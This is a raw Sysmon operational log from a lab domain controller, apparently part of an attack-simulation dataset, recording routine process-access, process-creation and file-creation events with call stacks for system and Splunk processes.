13:34:24.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E60-6005-7100-00000000A301}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E60-6005-7100-00000000A301}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.673{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E60-6005-7100-00000000A301}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.483{59A5CD1D-8E60-6005-7100-00000000A301}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.579{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.579{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.533{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_igol0lsl.ob2.ps12021-01-18 13:34:24.533 10341000x80000000000000002453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.507{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.497{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.496{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.496{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.496{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.496{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.495{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.495{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.495{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 